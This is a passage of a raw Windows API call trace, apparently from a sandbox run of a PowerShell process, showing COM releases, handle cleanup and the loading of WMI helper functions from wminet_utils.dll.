0x0 [0145.907] IUnknown:Release (This=0x1be5a8c0) returned 0x1 [0145.907] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.907] IUnknown:Release (This=0x1be5af10) returned 0x1 [0145.907] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.907] IUnknown:Release (This=0x1be5ff20) returned 0x1 [0145.907] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.907] IUnknown:Release (This=0x1be601d0) returned 0x1 [0145.908] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.908] IUnknown:Release (This=0x1be60480) returned 0x1 [0145.908] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.908] IUnknown:Release (This=0x1be60730) returned 0x1 [0145.908] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.908] IUnknown:Release (This=0x1be609e0) returned 0x1 [0145.909] IUnknown:Release (This=0x1be60730) returned 0x0 [0145.909] IUnknown:Release (This=0x1be60480) returned 0x0 [0145.910] IUnknown:Release (This=0x1be601d0) returned 0x0 [0145.910] IUnknown:Release (This=0x1be5ff20) returned 0x0 [0145.910] IUnknown:Release (This=0x1be5af10) returned 0x0 [0145.911] IUnknown:Release (This=0x1be5a8c0) returned 0x0 [0145.911] IUnknown:Release (This=0x1be59a70) returned 0x0 [0145.911] IUnknown:Release (This=0x1be58420) returned 0x0 [0145.912] IUnknown:Release (This=0x1be57d70) returned 0x0 [0145.912] IUnknown:Release (This=0x1be576c0) returned 0x0 [0145.913] IUnknown:Release (This=0x1be57010) returned 0x0 [0145.913] IUnknown:Release (This=0x1be56970) returned 0x0 [0145.913] IUnknown:Release (This=0x1be562d0) returned 0x0 [0145.914] IUnknown:Release (This=0x1be55c30) returned 0x0 [0145.914] IUnknown:Release (This=0x1be55590) returned 0x0 [0145.914] IUnknown:Release (This=0x1be54ef0) returned 0x0 [0145.915] IUnknown:Release (This=0x1be52450) returned 0x0 [0145.915] IUnknown:Release (This=0x1be514d0) returned 0x0 [0145.915] IUnknown:Release (This=0x1be50d50) returned 0x0 [0145.915] IUnknown:Release (This=0x1be509e0) returned 0x0 [0145.915] IUnknown:Release (This=0x1be504e0) returned 0x0 [0145.916] IUnknown:Release (This=0x1be50240) returned 0x0 [0145.916] IUnknown:Release (This=0x1be501c0) returned 0x0 [0145.916] IUnknown:Release (This=0x1be4fe50) returned 0x0 [0145.916] IUnknown:Release (This=0x1be4f950) returned 0x0 [0145.916] IUnknown:Release (This=0x1be4f6b0) returned 0x0 [0145.917] IUnknown:Release (This=0x1be4f630) returned 0x0 [0145.917] IUnknown:Release (This=0x1be4f2c0) returned 0x0 [0145.917] IUnknown:Release (This=0x1be4edc0) returned 0x0 [0145.917] IUnknown:Release (This=0x1be4eb00) returned 0x0 [0145.918] IUnknown:Release (This=0x1be4e790) returned 0x0 [0145.918] IUnknown:Release (This=0x1be4e290) returned 0x0 [0145.918] IUnknown:Release (This=0x1be4dfd0) returned 0x0 [0145.918] IUnknown:Release (This=0x1be49730) returned 0x0 [0145.918] IUnknown:Release (This=0x1be4dc50) returned 0x0 [0145.919] IUnknown:Release (This=0x1be4d5e0) returned 0x0 [0145.919] IUnknown:Release (This=0x1be4cfd0) returned 0x0 [0145.919] IUnknown:Release (This=0x1be4cac0) returned 0x0 [0145.919] IUnknown:Release (This=0x1be4c750) returned 0x0 [0145.920] IUnknown:Release (This=0x1be4c0e0) returned 0x0 [0145.920] IUnknown:Release (This=0x1be45460) returned 0x0 [0145.920] IUnknown:Release (This=0x1be44830) returned 0x0 [0148.120] LocalFree (hMem=0x1ef8e0) returned 0x0 [0148.121] LocalFree (hMem=0x1ef7d0) returned 0x0 [0148.123] IUnknown:Release (This=0x1be601d0) returned 0x1 [0148.125] IUnknown:Release (This=0x1be5ff20) returned 0x1 [0148.126] IUnknown:Release (This=0x1be609e0) returned 0x0 [0148.133] DeregisterEventSource (hEventLog=0x1b9e0008) returned 1 [0148.138] CoGetContextToken (in: pToken=0x1b5ef220 | out: pToken=0x1b5ef220) returned 0x0 [0148.138] WbemLocator:IUnknown:Release (This=0x1b913770) returned 0x1 [0148.138] IUnknown:Release (This=0x1be445f8) returned 0x0 [0148.159] CloseHandle (hObject=0x3e0) returned 1 [0148.159] CloseHandle (hObject=0x1d0) returned 1 [0148.160] CloseHandle (hObject=0x1d4) returned 1 [0148.162] CloseHandle (hObject=0x310) returned 1 [0148.163] CloseHandle (hObject=0x1cc) returned 1 [0148.164] CloseHandle (hObject=0x46c) returned 1 [0148.164] CloseHandle (hObject=0x3a8) returned 1 [0148.165] CloseHandle (hObject=0x45c) returned 1 [0148.166] CloseHandle (hObject=0x3a4) returned 1 [0148.167] CloseHandle (hObject=0x380) returned 1 [0148.167] CloseHandle (hObject=0x3bc) returned 1 [0148.168] CloseHandle (hObject=0x39c) returned 1 [0148.168] CloseHandle (hObject=0x398) returned 1 [0148.169] CloseHandle (hObject=0x394) returned 1 [0148.170] CloseHandle (hObject=0x390) returned 1 [0148.170] CloseHandle (hObject=0x38c) returned 1 [0148.171] CloseHandle (hObject=0x388) returned 1 [0148.171] CloseHandle (hObject=0x384) returned 1 [0148.171] CloseHandle (hObject=0x35c) returned 1 [0148.172] CloseHandle (hObject=0x3b8) returned 1 [0148.172] CloseHandle (hObject=0x34c) returned 1 [0148.173] CloseHandle (hObject=0x484) returned 1 [0148.173] CloseHandle (hObject=0x3d4) returned 1 [0148.174] CloseHandle (hObject=0x348) returned 1 [0148.174] CloseHandle (hObject=0x328) returned 1 [0148.175] CloseHandle (hObject=0x344) returned 1 [0148.175] CloseHandle (hObject=0x340) returned 1 [0148.176] UnmapViewOfFile (lpBaseAddress=0x2750000) returned 1 [0148.177] CloseHandle (hObject=0x330) returned 1 [0148.178] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0148.179] CloseHandle (hObject=0x2f0) returned 1 [0148.179] RegCloseKey (hKey=0x44c) returned 0x0 [0148.180] CloseHandle (hObject=0x3e4) returned 1 [0148.185] CoGetContextToken (in: pToken=0x1b5ec810 | out: pToken=0x1b5ec810) returned 0x0 [0148.185] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.185] IUnknown:Release (This=0x1be601d0) returned 0x0 [0148.186] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.186] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x1 [0148.186] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x0 [0148.186] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.186] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x1 [0148.186] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x0 [0148.187] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.187] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x1 [0148.187] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x0 [0148.188] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.188] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x1 [0148.188] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x0 [0148.189] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.189] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x1 [0148.189] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x0 [0148.190] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.190] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x1 [0148.190] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x0 [0148.191] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.191] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x1 [0148.191] WbemDefPath:IUnknown:Release (This=0x1be53190) returned 0x0 [0148.192] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.192] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x1 [0148.193] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x0 [0148.193] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.193] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x1 [0148.194] WbemDefPath:IUnknown:Release (This=0x1be512e0) returned 0x0 [0148.194] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.195] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x1 [0148.195] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x0 [0148.195] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.195] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x1 [0148.196] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x0 [0148.196] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.196] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x1 [0148.196] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x0 [0148.197] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.197] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x1 [0148.197] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x0 [0148.198] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.198] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x1 [0148.199] WbemDefPath:IUnknown:Release (This=0x1be53610) returned 0x0 [0148.199] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.199] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x1 [0148.200] WbemDefPath:IUnknown:Release (This=0x1be530d0) returned 0x0 [0148.200] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.200] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x1 [0148.201] WbemDefPath:IUnknown:Release (This=0x1be53850) returned 0x0 [0148.201] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.201] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x1 [0148.201] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x0 [0148.202] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.202] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x1 [0148.202] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x0 [0148.202] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.203] IUnknown:Release (This=0x1be5ff20) returned 0x0 [0148.203] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.203] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x1 [0148.203] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x0 [0148.204] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.204] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x1 [0148.204] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x0 [0148.204] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.204] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x1 [0148.204] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x0 [0148.205] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.205] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x1 [0148.205] WbemLocator:IUnknown:Release (This=0x1be444f8) returned 0x0 [0148.207] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.207] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x1 [0148.207] WbemDefPath:IUnknown:Release (This=0x1be53010) returned 0x0 [0148.207] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.207] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x1 [0148.207] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x0 [0148.208] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.208] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x1 [0148.208] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x0 [0148.208] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.209] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x1 [0148.209] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x0 [0148.209] CoGetContextToken (in: pToken=0x1b5ec730 | out: pToken=0x1b5ec730) returned 0x0 [0148.209] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x1 [0148.210] IUnknown:Release (This=0x142480) returned 0x0 [0148.210] WbemDefPath:IUnknown:Release (This=0x1be53250) returned 0x0 Thread: id = 9 os_tid = 0x704 [0080.969] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0080.975] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0080.983] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.983] CoTaskMemFree (pv=0x1ef9f0) [0080.985] VirtualQuery (in: lpAddress=0x1c90dd40, lpBuffer=0x1c90ec00, dwLength=0x30 | out: lpBuffer=0x1c90ec00*(BaseAddress=0x1c90d000, AllocationBase=0x1bf80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.993] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.993] CoTaskMemFree (pv=0x1ef9f0) [0080.996] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.996] CoTaskMemFree (pv=0x1ef9f0) [0081.000] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.000] CoTaskMemFree (pv=0x1ef9f0) [0081.014] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.014] CoTaskMemFree (pv=0x1ef9f0) [0081.017] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.017] CoTaskMemFree (pv=0x1ef9f0) [0081.018] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.018] CoTaskMemFree (pv=0x1ef9f0) [0081.024] VirtualQuery (in: lpAddress=0x1c90dff0, lpBuffer=0x1c90eeb0, dwLength=0x30 | out: lpBuffer=0x1c90eeb0*(BaseAddress=0x1c90d000, AllocationBase=0x1bf80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0081.025] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.025] CoTaskMemFree (pv=0x1ef9f0) [0081.028] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.028] CoTaskMemFree (pv=0x1ef9f0) [0081.028] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.028] CoTaskMemFree (pv=0x1ef9f0) [0081.030] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.030] CoTaskMemFree (pv=0x1ef9f0) [0081.035] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.035] CoTaskMemFree (pv=0x1ef9f0) [0081.094] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.095] CoTaskMemFree (pv=0x1ef9f0) [0081.098] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.098] CoTaskMemFree (pv=0x1ef9f0) [0081.099] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.099] CoTaskMemFree (pv=0x1ef9f0) [0081.102] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.102] CoTaskMemFree (pv=0x1ef9f0) [0081.104] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.104] CoTaskMemFree (pv=0x1ef9f0) [0081.106] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.106] CoTaskMemFree (pv=0x1ef9f0) [0081.108] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.108] CoTaskMemFree (pv=0x1ef9f0) [0081.127] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.127] CoTaskMemFree (pv=0x1ef9f0) [0081.210] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.210] CoTaskMemFree (pv=0x1ef9f0) [0081.220] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0081.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.221] CoTaskMemFree (pv=0x1ef9f0) [0082.155] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0082.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.155] CoTaskMemFree (pv=0x1ef9f0) [0082.227] VirtualQuery (in: lpAddress=0x1c90d610, lpBuffer=0x1c90e4d0, dwLength=0x30 | out: lpBuffer=0x1c90e4d0*(BaseAddress=0x1c90d000, AllocationBase=0x1bf80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0082.410] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0082.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.411] CoTaskMemFree (pv=0x1ef9f0) [0082.440] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0082.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.440] CoTaskMemFree (pv=0x1ef9f0) [0082.542] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x310 [0082.544] CoGetObjectContext (in: riid=0x1c90dd18*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dd10 | out: ppv=0x1c90dd10*=0x142498) returned 0x0 [0083.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c90c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0083.170] CoTaskMemAlloc (cb=0x43) returned 0x1b90b750 [0083.170] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\\\wminet_utils.dll") returned 0x642ffff0000 [0083.367] CoTaskMemFree (pv=0x1b90b750) [0083.369] CoTaskMemAlloc (cb=0xf) returned 0x1b911750 [0083.369] GetProcAddress (hModule=0x642ffff0000, lpProcName="ResetSecurity") returned 0x642ffff20e0 [0083.369] CoTaskMemFree (pv=0x1b911750) [0083.400] CoTaskMemAlloc (cb=0xd) returned 0x1b911750 [0083.401] GetProcAddress (hModule=0x642ffff0000, lpProcName="SetSecurity") returned 0x642ffff21b0 [0083.401] CoTaskMemFree (pv=0x1b911750) [0083.432] CoTaskMemAlloc (cb=0x14) returned 0x1b911750 [0083.432] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServices") returned 0x642ffff2290 [0083.432] CoTaskMemFree (pv=0x1b911750) [0083.502] CoTaskMemAlloc (cb=0x1a) returned 0x1b920d60 [0083.503] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServicesObject") returned 0x642ffff23b0 [0083.503] CoTaskMemFree (pv=0x1b920d60) [0083.561] CoTaskMemAlloc (cb=0x13) returned 0x1b911750 [0083.561] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyHandle") returned 0x642ffff24d0 [0083.561] CoTaskMemFree (pv=0x1b911750) [0083.583] CoTaskMemAlloc (cb=0x14) returned 0x1b911750 [0083.583] GetProcAddress (hModule=0x642ffff0000, lpProcName="WritePropertyValue") returned 0x642ffff2500 [0083.583] CoTaskMemFree (pv=0x1b911750) [0083.617] CoTaskMemAlloc (cb=0x7) returned 0x1b8e80e0 [0083.617] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530 [0083.617] CoTaskMemFree (pv=0x1b8e80e0) [0083.647] CoTaskMemAlloc (cb=0x11) returned 0x1b911790 [0083.647] GetProcAddress (hModule=0x642ffff0000, lpProcName="VerifyClientKey") returned 0x642ffff31f0 [0083.647] CoTaskMemFree (pv=0x1b911790) [0083.660] CoTaskMemAlloc (cb=0x11) returned 0x1b911790 [0083.660] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetQualifierSet") returned 0x642ffff2a50 [0083.660] CoTaskMemFree (pv=0x1b911790) [0083.668] CoTaskMemAlloc (cb=0x5) returned 0x1b8e80e0 [0083.669] GetProcAddress (hModule=0x642ffff0000, lpProcName="Get") returned 0x642ffff2700 [0083.669] CoTaskMemFree (pv=0x1b8e80e0) [0083.712] CoTaskMemAlloc (cb=0x5) returned 0x1b8e80e0 [0083.712] GetProcAddress (hModule=0x642ffff0000, lpProcName="Put") returned 0x642ffff26c0 [0083.712] CoTaskMemFree (pv=0x1b8e80e0) [0083.748] CoTaskMemAlloc (cb=0x8) returned 0x1b8e80e0 [0083.748] GetProcAddress (hModule=0x642ffff0000, lpProcName="Delete") returned 0x642ffff2750 [0083.748] CoTaskMemFree (pv=0x1b8e80e0) [0083.771] CoTaskMemAlloc (cb=0xa) returned 0x1b911790 [0083.771] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetNames") returned 0x642ffff2760 [0083.771] CoTaskMemFree (pv=0x1b911790) [0083.788] CoTaskMemAlloc (cb=0x12) returned 0x1b911790 [0083.789] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginEnumeration") returned 0x642ffff27b0 [0083.789] CoTaskMemFree (pv=0x1b911790) [0083.796] CoTaskMemAlloc (cb=0x6) returned 0x1b8e80e0 [0083.797] GetProcAddress (hModule=0x642ffff0000, lpProcName="Next") returned 0x642ffff27c0 [0083.797] CoTaskMemFree (pv=0x1b8e80e0) [0083.831] CoTaskMemAlloc (cb=0x10) returned 0x1b911790 [0083.831] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndEnumeration") returned 0x642ffff2810 [0083.831] CoTaskMemFree (pv=0x1b911790) [0083.840] CoTaskMemAlloc (cb=0x19) returned 0x1b920a60 [0083.840] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyQualifierSet") returned 0x642ffff2820 [0083.840] CoTaskMemFree (pv=0x1b920a60) [0083.851] CoTaskMemAlloc (cb=0x7) returned 0x1b8e80e0 [0083.851] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530 [0083.851] CoTaskMemFree (pv=0x1b8e80e0) [0083.852] CoTaskMemAlloc (cb=0xf) returned 0x1b911750 [0083.852] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetObjectText") returned 0x642ffff2840 [0083.852] CoTaskMemFree (pv=0x1b911750) [0083.876] CoTaskMemAlloc (cb=0x13) returned 0x1b911790 [0083.876] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnDerivedClass") returned 0x642ffff2860 [0083.876] CoTaskMemFree (pv=0x1b911790) [0083.880] CoTaskMemAlloc (cb=0xf) returned 0x1b911750 [0083.880] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnInstance") returned 0x642ffff2880 [0083.880] CoTaskMemFree (pv=0x1b911750) [0083.883] CoTaskMemAlloc (cb=0xb) returned 0x1b911790 [0083.883] GetProcAddress (hModule=0x642ffff0000, lpProcName="CompareTo") returned 0x642ffff28a0 [0083.883] CoTaskMemFree (pv=0x1b911790) [0083.885] CoTaskMemAlloc (cb=0x13) returned 0x1b911790 [0083.886] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyOrigin") returned 0x642ffff28c0 [0083.886] CoTaskMemFree (pv=0x1b911790) [0083.889] CoTaskMemAlloc (cb=0xe) returned 0x1b911790 [0083.889] GetProcAddress (hModule=0x642ffff0000, lpProcName="InheritsFrom") returned 0x642ffff28e0 [0083.889] CoTaskMemFree (pv=0x1b911790) [0083.891] CoTaskMemAlloc (cb=0xb) returned 0x1b911790 [0083.891] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethod") returned 0x642ffff28f0 [0083.891] CoTaskMemFree (pv=0x1b911790) [0083.893] CoTaskMemAlloc (cb=0xb) returned 0x1b911790 [0083.893] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutMethod") returned 0x642ffff2940 [0083.893] CoTaskMemFree (pv=0x1b911790) [0083.894] CoTaskMemAlloc (cb=0xe) returned 0x1b911790 [0083.894] GetProcAddress (hModule=0x642ffff0000, lpProcName="DeleteMethod") returned 0x642ffff2990 [0083.894] CoTaskMemFree (pv=0x1b911790) [0083.895] CoTaskMemAlloc (cb=0x18) returned 0x1b911790 [0083.895] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginMethodEnumeration") returned 0x642ffff29a0 [0083.895] CoTaskMemFree (pv=0x1b911790) [0083.896] CoTaskMemAlloc (cb=0xc) returned 0x1b911790 [0083.897] GetProcAddress (hModule=0x642ffff0000, lpProcName="NextMethod") 